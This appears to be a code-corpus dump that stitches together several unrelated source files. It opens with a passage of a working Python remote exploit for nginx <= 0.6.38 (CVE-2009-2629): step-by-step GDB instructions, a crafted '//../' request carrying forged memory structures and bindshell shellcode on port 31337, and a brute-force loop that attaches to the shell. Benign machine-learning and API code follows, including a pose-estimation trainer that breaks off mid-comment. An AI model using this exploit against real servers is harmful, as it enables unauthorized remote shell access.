# (it'll be the one with "GET //../Aa0") and add 131 to it (decimal 131 to the
# hex pointer value). That should give you a good area to test with. You might
# want to use the range at that point and set the last octet to 00.
#
# NOTE: you'll need a configuration with merge_slashes enabled. I haven't yet
# found a "magic" combination that would cause the state machine to do
# what I want to make the bug trigger. Once I do, you can bet BUG will be
# replaced.
#Basically, on BT4:
#- compile
#- edit the configuration to enable merge slashes (just insert a line above the sendpage / sendfile config option "merge_slashes off;")
#- Launch nginx, and attach GDB to the worker
#- Send the exploit at it with offset 0x11111111
#- When the worker gets a sigsegv, it will be on a line which looks like "if (ctx->offset)", at that point type "p *r"
#- In the r data structure will be a few different fields, one which is a buffer that contains "GET //../Aa0Aa1Aa2..". This buffer has an address (lets say 0x8c1d32f).
#- Save off this address, and detach from the worker. A new one will spawn (the "manager" process will keep it going).
#- At this point, rerun the exploit, setting the offset to 0x8c1d300 and adding the -b flag
#- In a minute or two, you should be given the shell.
import os
import sys
import socket
import select
import struct
import time
import urllib
REQUEST_METHOD='GET '
# NOTE - this is a 32-bit null pointer. A 64-bit version would be 8-bytes (but take care to re-verify the structures)
NULLPTR='\x00\x00\x00\x00'
# NOTE - this shellcode was shamelessly stolen from the www
# port 31337 bindshell for /bin/sh
SHELL='\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80'
# Why did I write this up this way? Because given enough time, I think I can
# find a proper set of state change which can give me the same effect (ie: ../
# appearing as the 3rd, 4th, and 5th characters) at a later date.
# That's all controlled by the complex uri parsing bit, though.
DOUBLE_SLASH='//../'
BUG=DOUBLE_SLASH
# taken from the metasploit pattern_create.rb
PATTERN='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4'
def connect_socket(host,port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect( (host, port) )
except:
return 0
#sock.setblocking(0)
return sock
def handle_connection(sock):
while(1):
r, w, e = select.select( [sock, sys.stdin],
[],
[sock, sys.stdin] )
for s in r:
if s == sys.stdin:
buf = sys.stdin.readline()
try:
if buf != '':
sock.send(buf)
except:
print "Xon close?"
return 0
elif s == sock:
try:
buf = sock.recv(100)
except:
print "Xon close?"
return 0
if buf != '':
sys.stdout.write(buf)
def main(argv):
argc = len(argv)
if argc < 4:
print "usage: %s <host> <port> <ctx_addr> [-b]" % (argv[0])
print "[*] exploit for nginx <= 0.6.38 CVE 2009-2629"
print "[*] host = the remote host name"
print "[*] port = the remote port"
print "[*] ctx_addr is where the context address should begin at"
print "[*] -b specifies a brute-force (which will start at ctx_addr"
sys.exit(0)
host = argv[1]
port = int(argv[2])
ctx_addr = int(argv[3],16)
brute_flag = 0
if(argc == 5):
brute_flag = 1
testing = 1
print "[*] target: %s:%d" % (host, port)
try:
sd = urllib.urlopen("http://%s:%d" % (host, port))
sd.close()
except IOError, errmsg:
print "[*] error: %s" % (errmsg)
sys.exit(1)
print "[*] sending exploit string to %s:%d" % (host, port)
while(testing):
CTX_ADDRESS = struct.pack('<L',ctx_addr)
CTX_OUT_ADDRESS = struct.pack('<L', ctx_addr-60)
POOL_ADDRESS = struct.pack('<L',ctx_addr+56)
DATA_ADDRESS = struct.pack('<L',ctx_addr+86)
RANGE_ADDRESS = struct.pack('<L',ctx_addr+124)
SHELL_ADDRESS = struct.pack('<L',ctx_addr+128)
#PADDING
SHELLCODE=PATTERN[:67]
#the output context structure
SHELLCODE+=NULLPTR*9+POOL_ADDRESS+NULLPTR*4+SHELL_ADDRESS
#Magic
SHELLCODE+=CTX_OUT_ADDRESS+CTX_ADDRESS+NULLPTR
#this is the context object - some null ptrs, then we set range, then
#pool address
SHELLCODE+=NULLPTR*3+RANGE_ADDRESS+'\x01\x00\x00\x00'
SHELLCODE+=NULLPTR*2+POOL_ADDRESS
#this is the data buffer object
SHELLCODE+=NULLPTR*4+SHELL_ADDRESS+NULLPTR
#this is the pool memory structure ..
SHELLCODE+=DATA_ADDRESS+NULLPTR+POOL_ADDRESS+NULLPTR*12+NULLPTR
# this is the range structure
SHELLCODE+='\xff\xff\xff\xff'+NULLPTR*3
SHELLCODE+=SHELL
payload = REQUEST_METHOD
payload += BUG
payload += SHELLCODE
payload += ' HTTP/1.0\r\n\r\n'
sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sd.connect((host, port))
sd.send(payload)
sd.close()
if (brute_flag):
nsock = connect_socket(host,31337)
if nsock != 0:
print "[*] Successful Exploit via buffer: %x" % (ctx_addr)
testing = 0
handle_connection(nsock)
else:
ctx_addr = ctx_addr + 1
else:
testing = 0
print "[*] FIN."
if __name__ == "__main__":
main(sys.argv)
sys.exit(0)
# EOF
| 36.133663 | 360 | 0.626113 |
4a225571c986c2773d4f8f6f88b6bc0f58dfe090 | 2,198 | py | Python | kh-kim models/main.py | dudtjakdl/OpenNMT-Korean-To-English | 32fcdb860906f40f84375ec17a23ae32cb90baa0 | [
"Apache-2.0"
] | 11 | 2020-01-27T02:17:07.000Z | 2021-06-29T08:58:08.000Z | kh-kim models/main.py | dudtjakdl/OpenNMT-Korean-To-English | 32fcdb860906f40f84375ec17a23ae32cb90baa0 | [
"Apache-2.0"
] | null | null | null | kh-kim models/main.py | dudtjakdl/OpenNMT-Korean-To-English | 32fcdb860906f40f84375ec17a23ae32cb90baa0 | [
"Apache-2.0"
] | 4 | 2020-02-10T05:32:22.000Z | 2022-02-04T13:14:11.000Z | import torch
import torch.nn as nn
import torch.optim as optim
from simple_nmt.encoder import Encoder
from simple_nmt.decoder import Decoder
from simple_nmt.seq2seq import Seq2Seq
from data_loader import DataLoader
#from train import
from hyperparams import Hyperparams
if __name__ == "__main__":
hparams = Hyperparams()
cuda = hparams.use_cuda and torch.cuda.is_available()
device = torch.device('cuda' if cuda else 'cpu')
enc, enc_hidden = Encoder()
dec, dec_hidden = Decoder()
model = Seq2Seq(enc, dec)
    model.flatten_parameters() # flattens the parameters into one contiguous block
model = nn.DataParallel(model).to(device)
optimizer = optim.Adam(model.module.parameters(), lr=hparams.lr)
    # The loss function is usually stored in a variable called criterion. reduction controls how the loss is aggregated; the default is mean, but sum is said to be faster (mean is the more accurate choice).
    # ignore_index is the index to ignore when computing the loss; there is no need to compute a loss for PADDED positions.
criterion = nn.CrossEntropyLoss(reduction='sum', ignore_index=PAD_token).to(device)
#########
# 데이터 로딩 & 벡터화
# (input(한글문장) & target(영어문장) 로드, 벡터로까지 만드는 과정 필요. (sentencepiece , 임베딩))
#########
# 데이터 리스트를 변수에 저장. 한-영 의 딕셔너리를 만든다. (문장1. 안녕 : hi)
# train / valid 데이터로 쪼개준다. total_time_step : 한 에폭에 몇 timestep이 도는지.
total_time_step, train_dataset, valid_dataset = split_dataset( # split_dataset은 dataset.py의 함수 이름.
hparams = hparams,
kor_vectors = kor_vectors,
eng_vectors = eng_vectors,
valid_ratio = 0.015
)
for epoch in range(hparams.max_ephochs):
train_loader = TranslationDataset(train_dataset)
        train_loader.start() # fetch the data in batch-sized chunks; runs on a thread
        train_loss, train_bleu = train(model, train_loader, criterion) # the train function runs a single epoch; call it here
        print(train_loss, train_bleu)
        train_loader.join() # when using threads, join them so they finish together, since their running times differ.
valid_loader = DataLoader(valid_dataset)
valid_loader.start()
valid_loss, valid_bleu = evaluate(model, valid_loader, criterion)
#train과 달리 evaluate은 gradient를 주지 않는다. 즉 back-prop (X). 단순 포워드, 한 에폭당 얼마나 좋아졌는지 / 오버피팅 나는지 확인 가능
print(valid_loss, valid_bleu)
valid_loader.join()
torch.save(model, "model.pt 경로")
| 36.633333 | 114 | 0.686078 |
4a2256158e0fa6c67b89a68c724977dcd068a741 | 1,921 | py | Python | pyzoo/test/zoo/zouwu/preprocessing/test_util.py | GZHoffie/analytics-zoo | d0258aa113ffd1a5c4927376fb32b09fb0baf73c | [
"Apache-2.0"
] | 4 | 2018-06-19T05:38:30.000Z | 2020-06-22T14:26:26.000Z | pyzoo/test/zoo/zouwu/preprocessing/test_util.py | GZHoffie/analytics-zoo | d0258aa113ffd1a5c4927376fb32b09fb0baf73c | [
"Apache-2.0"
] | 5 | 2021-06-08T23:28:18.000Z | 2022-02-10T05:31:27.000Z | pyzoo/test/zoo/zouwu/preprocessing/test_util.py | GZHoffie/analytics-zoo | d0258aa113ffd1a5c4927376fb32b09fb0baf73c | [
"Apache-2.0"
] | 1 | 2018-09-05T02:16:10.000Z | 2018-09-05T02:16:10.000Z | #
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from test.zoo.pipeline.utils.test_utils import ZooTestCase
from zoo.automl.common.util import *
from zoo.zouwu.preprocessing.utils import train_val_test_split
import pandas as pd
class TestUtil(ZooTestCase):
def setup_method(self, method):
pass
def teardown_method(self, method):
pass
def test_train_val_test_split(self):
# length test
sample_num = 100
look_back = 10
horizon = 1
dates = pd.date_range('1/1/2020', periods=sample_num)
values = np.random.randn(sample_num)
df = pd.DataFrame({"values": values}, index=dates)
train_df, val_df, test_df = train_val_test_split(df,
val_ratio=0.1,
test_ratio=0.1,
look_back=look_back,
horizon=horizon)
assert len(train_df) == sample_num * 0.8
assert len(val_df) == sample_num * 0.1 + look_back + horizon - 1
assert len(test_df) == sample_num * 0.1 + look_back + horizon - 1
# index test
assert pd.api.types.is_datetime64_any_dtype(test_df.index.dtype)
assert pd.api.types.is_datetime64_any_dtype(val_df.index.dtype)
| 39.204082 | 77 | 0.624154 |
4a2257367ccec7fb16591c5c83cf03d4bbfec444 | 3,183 | py | Python | simple_sentence_segment/model.py | OmarSayedMostafa/clinical_concept_extraction | 495581e2e8ec034c2a5ab985779cc4750a797875 | [
"MIT"
] | null | null | null | simple_sentence_segment/model.py | OmarSayedMostafa/clinical_concept_extraction | 495581e2e8ec034c2a5ab985779cc4750a797875 | [
"MIT"
] | null | null | null | simple_sentence_segment/model.py | OmarSayedMostafa/clinical_concept_extraction | 495581e2e8ec034c2a5ab985779cc4750a797875 | [
"MIT"
] | null | null | null | from six.moves import range
from six.moves import cPickle
import six
import os
import re
import numpy as np
dir_path = os.path.dirname(os.path.realpath(__file__))
if six.PY3:
cls = cPickle.load(open(os.path.join(dir_path, 'model/cls.pkl'), 'rb'), encoding='latin1')
elif six.PY2:
cls = cPickle.load(open(os.path.join(dir_path, 'model/cls.pkl'), 'rb'))
else:
raise RuntimeError
char_list = ['x', 'X', 'S', '8', '\n', '.', ':', '-', '*',
')', '?', '(', ',', '/', '#', '%', '\t', '+',
';', '=', '>', "'", '"', '&', ']', '<']
char2id = {item: item_id for item_id, item in enumerate(char_list)}
DEFAULT_EXCLUSIVE = ['M.D.', 'Dr.', 'vs.']
def get_possible_eos(text, exclusive_phrase):
possible_eos_re = [' [A-Z]', '\.', '\?', '\n', '\t', '\)',
'\]', '\}', '\*', '"', ':']
eos_re = re.compile('|'.join(possible_eos_re))
eos = set()
for eos_find in eos_re.finditer(text):
start_id = eos_find.span()[0]
exclusive = False
for phrase in exclusive_phrase:
if text[start_id - len(phrase) + 1: start_id + 1] == phrase:
exclusive = True
break
if not exclusive:
eos.update([start_id])
eos = list(eos)
eos.sort()
return eos
def get_context_char(text, char_id, window=5):
max_len = len(text)
assert 0 <= char_id < max_len
left_text = []
for i in range(window):
if char_id - i - 1 < 0:
left_text.insert(0, ' ')
else:
left_text.insert(0, text[char_id - i - 1])
right_text = []
for i in range(window):
if char_id + 1 + i >= max_len:
right_text.append(' ')
else:
right_text.append(text[char_id + 1 + i])
return left_text + [text[char_id]] + right_text
def one_hot_encoder(X):
final_output = []
for i in range(11):
targets = np.array(X[:, i]).reshape(-1)
final_output.append(np.eye(27)[targets])
final_output = np.concatenate(final_output, axis=-1)
return final_output
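# encode_char maps a character onto the normalized alphabet in char_list:
# lowercase letters become 'x', uppercase 'X', digits '8' and spaces 'S';
# any character not covered by char_list falls back to index 26 ("other").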
def encode_char(c):
if c.isalpha():
if c.islower():
normalized_char = 'x'
else:
normalized_char = 'X'
elif c.isdigit():
normalized_char = '8'
elif c == ' ':
normalized_char = 'S'
else:
normalized_char = c
if normalized_char in char_list:
return char2id[normalized_char]
else:
return 26
def get_span(eos_list, text):
eos_list = [item + 1 for item in eos_list]
eos_list.sort()
eos_list.insert(0, 0)
if len(text) not in eos_list:
eos_list.append(len(text))
spans = []
for i in range(len(eos_list) - 1):
s, t = eos_list[i], eos_list[i + 1]
if len(text[s:t].strip()) > 0:
spans.append((s, t))
return spans
def sentence_segment(text, exclusive_phrase=None):
if exclusive_phrase is None:
exclusive_phrase = DEFAULT_EXCLUSIVE
eos_id_list = get_possible_eos(text, exclusive_phrase)
X = []
for char_id in eos_id_list:
features = []
for c in get_context_char(text, char_id):
features.append(encode_char(c))
X.append(features)
X = np.array(X, dtype=int)
X = one_hot_encoder(X)
y = cls.predict(X)
valid_eos = [x_ for x_, y_ in zip(eos_id_list, y) if y_ == 1]
all_span = get_span(valid_eos, text)
return all_span
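# Example usage (illustrative text, not from the package):
#   text = "Pt seen today. Denies chest pain.\nPlan: follow up in 2 weeks."
#   for start, end in sentence_segment(text):
#       print(text[start:end].strip())
# Each (start, end) span indexes directly into the original string.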
| 23.753731 | 92 | 0.606346 |
4a2257d565e2e8986a305018096faf5375d183b2 | 3,381 | py | Python | lightedge/managers/servicemanager/servicehandler.py | davitharutyunyan1990/lightedge-runtime | 8e5a1a2c507afe46bf8ef0e1731db16440af374a | [
"Apache-2.0"
] | null | null | null | lightedge/managers/servicemanager/servicehandler.py | davitharutyunyan1990/lightedge-runtime | 8e5a1a2c507afe46bf8ef0e1731db16440af374a | [
"Apache-2.0"
] | null | null | null | lightedge/managers/servicemanager/servicehandler.py | davitharutyunyan1990/lightedge-runtime | 8e5a1a2c507afe46bf8ef0e1731db16440af374a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
#
# Copyright (c) 2020 Giovanni Baggio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Service handler."""
import empower_core.apimanager.apimanager as apimanager
# pylint: disable=W0223
class ServiceHandler(apimanager.APIHandler):
"""Handle services."""
URLS = [r"/api/v1/servicemanager/?",
r"/api/v1/servicemanager/([a-zA-Z0-9-]*)/?"]
@apimanager.validate(min_args=0, max_args=1)
def get(self, service_name=None):
"""List entries in the Match Map.
Args:
[0]: the service name
Example URLs:
GET /api/v1/servicemanager
[
{
"name": "service1",
"description": "description of service1",
"url": "http://localhost:8000/double_endpoint",
"timeout": 3000,
"expected_code": 200
},
{
"name": "service2",
"description": "description of service2",
"url": "http://localhost:8000/content_endpoint",
"timeout": 3000,
"expected_code": 200
}
]
GET /api/v1/servicemanager/service1
{
"name": "service1",
"description": "description of service1",
"url": "http://localhost:8000/double_endpoint",
"timeout": 3000,
"expected_code": 200
}
"""
return self.service.get_services(service_name)
@apimanager.validate(returncode=201, min_args=0, max_args=0)
def post(self, **kwargs):
"""Add a new service.
Example URLs:
POST /api/v1/servicemanager
{
"name": "service1",
"description": "description of service1",
"url": "http://localhost:8000/double_endpoint",
"timeout": 3000
}
"""
return self.service.add_service(kwargs)
@apimanager.validate(returncode=204, min_args=1, max_args=1)
def put(self, service_name, **kwargs):
"""Update a service.
Args:
[0]: the service name
Example URLs:
PUT /api/v1/servicemanager/service1
{
"name": "service1",
"description": "description of service1",
"url": "http://localhost:1234"
}
"""
return self.service.update_service(service_name, kwargs)
@apimanager.validate(returncode=204, min_args=1, max_args=1)
def delete(self, service_name):
"""Delete a service.
Args:
[0]: the service name
Example URLs:
DELETE /api/v1/servicemanager/service1
"""
self.service.delete_service(service_name)
| 31.896226 | 68 | 0.55102 |
4a225815208b7b5241a3aa2f60c6a689126c7177 | 25,909 | py | Python | lib/tfflat/.ipynb_checkpoints/base_multi_gpu-checkpoint.py | Ascend-Huawei/PoseFix | 9b287934879beadc71daa3a642cbbb4a0feb1db5 | [
"Apache-2.0"
] | null | null | null | lib/tfflat/.ipynb_checkpoints/base_multi_gpu-checkpoint.py | Ascend-Huawei/PoseFix | 9b287934879beadc71daa3a642cbbb4a0feb1db5 | [
"Apache-2.0"
] | null | null | null | lib/tfflat/.ipynb_checkpoints/base_multi_gpu-checkpoint.py | Ascend-Huawei/PoseFix | 9b287934879beadc71daa3a642cbbb4a0feb1db5 | [
"Apache-2.0"
] | 1 | 2021-08-19T09:51:25.000Z | 2021-08-19T09:51:25.000Z | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from npu_bridge.npu_init import *
import tensorflow as tf
import tensorflow.contrib.slim as slim
import numpy as np
from collections import OrderedDict as dict
import setproctitle
import os
import os.path as osp
import glob
import json
import math
import abc
from .net_utils import average_gradients, aggregate_batch, get_optimizer, get_tower_summary_dict
from .saver import load_model, Saver
from .timer import Timer
from .logger import colorlogger
from .utils import approx_equal
class ModelDesc(object):
__metaclass__ = abc.ABCMeta
def __init__(self):
self._loss = None
self._inputs = []
self._outputs = []
self._tower_summary = []
def set_inputs(self, *vars):
self._inputs = vars
def set_outputs(self, *vars):
self._outputs = vars
def set_loss(self, var):
if not isinstance(var, tf.Tensor):
raise ValueError("Loss must be an single tensor.")
# assert var.get_shape() == [], 'Loss tensor must be a scalar shape but got {} shape'.format(var.get_shape())
self._loss = var
def get_loss(self, include_wd=False):
if self._loss is None:
raise ValueError("Network doesn't define the final loss")
if include_wd:
weight_decay = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
weight_decay = tf.add_n(weight_decay)
return self._loss + weight_decay
else:
return self._loss
def get_inputs(self):
if len(self._inputs) == 0:
raise ValueError("Network doesn't define the inputs")
return self._inputs
def get_outputs(self):
if len(self._outputs) == 0:
raise ValueError("Network doesn't define the outputs")
return self._outputs
def add_tower_summary(self, name, vars, reduced_method='mean'):
assert reduced_method == 'mean' or reduced_method == 'sum', \
"Summary tensor only supports sum- or mean- reduced method"
if isinstance(vars, list):
for v in vars:
                if v.get_shape() == None:
print('Summary tensor {} got an unknown shape.'.format(name))
else:
assert v.get_shape().as_list() == [], \
"Summary tensor only supports scalar but got {}".format(v.get_shape().as_list())
tf.add_to_collection(name, v)
else:
if vars.get_shape() == None:
print('Summary tensor {} got an unknown shape.'.format(name))
else:
assert vars.get_shape().as_list() == [], \
"Summary tensor only supports scalar but got {}".format(vars.get_shape().as_list())
tf.add_to_collection(name, vars)
self._tower_summary.append([name, reduced_method])
@abc.abstractmethod
def make_network(self, is_train):
pass
class Base(object):
__metaclass__ = abc.ABCMeta
"""
build graph:
_make_graph
make_inputs
make_network
add_tower_summary
get_summary
train/test
"""
def __init__(self, net, cfg, data_iter=None, log_name='logs.txt'):
self._input_list = []
self._output_list = []
self._outputs = []
self.graph_ops = None
self.net = net
self.cfg = cfg
self.cur_epoch = 0
self.summary_dict = {}
# timer
self.tot_timer = Timer()
self.gpu_timer = Timer()
self.read_timer = Timer()
# logger
self.logger = colorlogger(cfg.log_dir, log_name=log_name)
# initialize tensorflow and npu
config = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)
config.gpu_options.allow_growth = True
custom_op = config.graph_options.rewrite_options.custom_optimizers.add()
custom_op.name = "NpuOptimizer"
config.graph_options.rewrite_options.remapping = RewriterConfig.OFF
self.init_sess = tf.Session(config=config)
self.init_sess.run(npu_ops.initialize_system())
        config.gpu_options.visible_device_list = str(get_local_rank_id()) # "hvd.local_rank" replaced with "get_local_rank_id"
self.sess = tf.Session(config=npu_config_proto(config_proto=config))
# build_graph
self.build_graph()
# get data iter
self._data_iter = data_iter
@abc.abstractmethod
def _make_data(self):
return
@abc.abstractmethod
def _make_graph(self):
return
def build_graph(self):
# all variables should be in the same graph and stored in cpu.
with tf.device('/cpu:0'):
tf.set_random_seed(2333)
self.graph_ops = self._make_graph()
if not isinstance(self.graph_ops, list) and not isinstance(self.graph_ops, tuple):
self.graph_ops = [self.graph_ops]
self.summary_dict.update( get_tower_summary_dict(self.net._tower_summary) )
def load_weights(self, model=None):
load_ImageNet = True
if model == 'last_epoch':
sfiles = os.path.join(self.cfg.model_dump_dir, 'snapshot_*.ckpt.meta')
sfiles = glob.glob(sfiles)
if len(sfiles) > 0:
sfiles.sort(key=os.path.getmtime)
sfiles = [i[:-5] for i in sfiles if i.endswith('.meta')]
model = sfiles[-1]
else:
self.logger.critical('No snapshot model exists.')
return
load_ImageNet = False
if isinstance(model, int):
model = os.path.join(self.cfg.model_dump_dir, 'snapshot_%d.ckpt' % model)
load_ImageNet = False
if isinstance(model, str) and (osp.exists(model + '.meta') or osp.exists(model)):
self.logger.info('Initialized model weights from {} ...'.format(model))
load_model(self.sess, model, load_ImageNet)
if model.split('/')[-1].startswith('snapshot_'):
self.cur_epoch = int(model[model.find('snapshot_')+9:model.find('.ckpt')])
self.logger.info('Current epoch is %d.' % self.cur_epoch)
else:
self.logger.critical('Load nothing. There is no model in path {}.'.format(model))
def next_feed(self):
if self._data_iter is None:
raise ValueError('No input data.')
feed_dict = dict()
for inputs in self._input_list:
blobs = next(self._data_iter)
for i, inp in enumerate(inputs):
inp_shape = inp.get_shape().as_list()
if None in inp_shape:
feed_dict[inp] = blobs[i]
else:
feed_dict[inp] = blobs[i].reshape(*inp_shape)
return feed_dict
class Trainer(Base):
def __init__(self, net, cfg, data_iter=None):
self.lr_eval = cfg.lr
self.lr = tf.Variable(cfg.lr, trainable=False)
self._optimizer = get_optimizer(self.lr, cfg.optimizer)
super(Trainer, self).__init__(net, cfg, data_iter, log_name='train_logs.txt')
# make data
self._data_iter, self.itr_per_epoch = self._make_data()
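    # IoU helper used when aligning ground-truth boxes with detector output:
    # src_roi is a (1, 4) box and dst_roi an (N, 4) array of boxes, both in
    # (x, y, width, height) format; it returns the overlap ratio of the source
    # box with each destination box.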
def compute_iou(self, src_roi, dst_roi):
# IoU calculate with GTs
xmin = np.maximum(dst_roi[:,0], src_roi[:,0])
ymin = np.maximum(dst_roi[:,1], src_roi[:,1])
xmax = np.minimum(dst_roi[:,0]+dst_roi[:,2], src_roi[:,0]+src_roi[:,2])
ymax = np.minimum(dst_roi[:,1]+dst_roi[:,3], src_roi[:,1]+src_roi[:,3])
interArea = np.maximum(0, xmax - xmin) * np.maximum(0, ymax - ymin)
boxAArea = dst_roi[:,2] * dst_roi[:,3]
boxBArea = np.tile(src_roi[:,2] * src_roi[:,3],(len(dst_roi),1))
sumArea = boxAArea + boxBArea
iou = interArea / (sumArea - interArea + 1e-5)
return iou
def _make_data(self):
from dataset import Dataset
from gen_batch import generate_batch
d = Dataset()
train_data = d.load_train_data()
## modify train_data to the result of the decoupled initial model
with open(d.test_on_trainset_path, 'r') as f:
test_on_trainset = json.load(f)
# sort list by img_id
train_data = sorted(train_data, key=lambda k: k['image_id'])
test_on_trainset = sorted(test_on_trainset, key=lambda k: k['image_id'])
# cluster train_data and test_on_trainset by img_id
cur_img_id = train_data[0]['image_id']
data_gt = []
data_gt_per_img = []
for i in range(len(train_data)):
if train_data[i]['image_id'] == cur_img_id:
data_gt_per_img.append(train_data[i])
else:
data_gt.append(data_gt_per_img)
cur_img_id = train_data[i]['image_id']
data_gt_per_img = [train_data[i]]
if len(data_gt_per_img) > 0:
data_gt.append(data_gt_per_img)
cur_img_id = test_on_trainset[0]['image_id']
data_out = []
data_out_per_img = []
for i in range(len(test_on_trainset)):
if test_on_trainset[i]['image_id'] == cur_img_id:
data_out_per_img.append(test_on_trainset[i])
else:
data_out.append(data_out_per_img)
cur_img_id = test_on_trainset[i]['image_id']
data_out_per_img = [test_on_trainset[i]]
if len(data_out_per_img) > 0:
data_out.append(data_out_per_img)
# remove false positive images
i = 0
j = 0
aligned_data_out = []
while True:
gt_img_id = data_gt[i][0]['image_id']
out_img_id = data_out[j][0]['image_id']
if gt_img_id > out_img_id:
j = j + 1
elif gt_img_id < out_img_id:
i = i + 1
else:
aligned_data_out.append(data_out[j])
i = i + 1
j = j + 1
if j == len(data_out) or i == len(data_gt):
break
data_out = aligned_data_out
# add false negative images
j = 0
aligned_data_out = []
for i in range(len(data_gt)):
gt_img_id = data_gt[i][0]['image_id']
out_img_id = data_out[j][0]['image_id']
if gt_img_id == out_img_id:
aligned_data_out.append(data_out[j])
j = j + 1
else:
aligned_data_out.append([])
if j == len(data_out):
break
data_out = aligned_data_out
# they should contain annotations from all the images
assert len(data_gt) == len(data_out)
# for each img
for i in range(len(data_gt)):
bbox_out_per_img = np.zeros((len(data_out[i]),4))
joint_out_per_img = np.zeros((len(data_out[i]),self.cfg.num_kps*3))
assert len(data_gt[i]) == len(data_out[i])
# for each data_out in an img
for j in range(len(data_out[i])):
bbox = data_out[i][j]['bbox'] #x, y, width, height
joint = data_out[i][j]['keypoints']
bbox_out_per_img[j,:] = bbox
joint_out_per_img[j,:] = joint
# for each gt in an img
for j in range(len(data_gt[i])):
bbox_gt = np.array(data_gt[i][j]['bbox']) #x, y, width, height
joint_gt = np.array(data_gt[i][j]['joints'])
# IoU calculate with detection outputs of other methods
iou = self.compute_iou(bbox_gt.reshape(1,4), bbox_out_per_img)
out_idx = np.argmax(iou)
data_gt[i][j]['estimated_joints'] = [joint_out_per_img[out_idx,:]]
# for swap
num_overlap = 0
near_joints = []
for k in range(len(data_gt[i])):
bbox_gt_k = np.array(data_gt[i][k]['bbox'])
iou_with_gt_k = self.compute_iou(bbox_gt.reshape(1,4), bbox_gt_k.reshape(1,4))
if k == j or iou_with_gt_k < 0.1:
continue
num_overlap += 1
near_joints.append(np.array(data_gt[i][k]['joints']).reshape(self.cfg.num_kps,3))
data_gt[i][j]['overlap'] = num_overlap
if num_overlap > 0:
data_gt[i][j]['near_joints'] = near_joints
else:
data_gt[i][j]['near_joints'] = [np.zeros([self.cfg.num_kps,3])]
# flatten data_gt
train_data = [y for x in data_gt for y in x]
from tfflat.data_provider import DataFromList, MultiProcessMapDataZMQ, BatchData, MapData
data_load_thread = DataFromList(train_data)
if self.cfg.multi_thread_enable:
data_load_thread = MultiProcessMapDataZMQ(data_load_thread, self.cfg.num_thread, generate_batch, strict=True)
else:
data_load_thread = MapData(data_load_thread, generate_batch)
data_load_thread = BatchData(data_load_thread, self.cfg.batch_size)
data_load_thread.reset_state()
dataiter = data_load_thread.get_data()
return dataiter, math.ceil(len(train_data)/self.cfg.batch_size/self.cfg.num_gpus)
def _make_graph(self):
self.logger.info("Generating training graph on {} GPUs ...".format(self.cfg.num_gpus))
weights_initializer = slim.xavier_initializer()
biases_initializer = tf.constant_initializer(0.)
biases_regularizer = tf.no_regularizer
weights_regularizer = tf.contrib.layers.l2_regularizer(self.cfg.weight_decay)
# npu version
with tf.variable_scope(tf.get_variable_scope()):
with slim.arg_scope([slim.conv2d, slim.conv2d_in_plane, \
slim.conv2d_transpose, slim.separable_conv2d,
slim.fully_connected],
weights_regularizer=weights_regularizer,
biases_regularizer=biases_regularizer,
weights_initializer=weights_initializer,
biases_initializer=biases_initializer):
self.net.make_network(is_train=True)
loss = self.net.get_loss(include_wd=True)
self._input_list.append( self.net.get_inputs() )
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
train_op = self._optimizer.optimize(loss)
return train_op
# tower_grads = []
# with tf.variable_scope(tf.get_variable_scope()):
# for i in range(self.cfg.num_gpus):
# with tf.device('/cpu:0'):
# with tf.name_scope('tower_%d' % i) as name_scope:
# # Force all Variables to reside on the CPU.
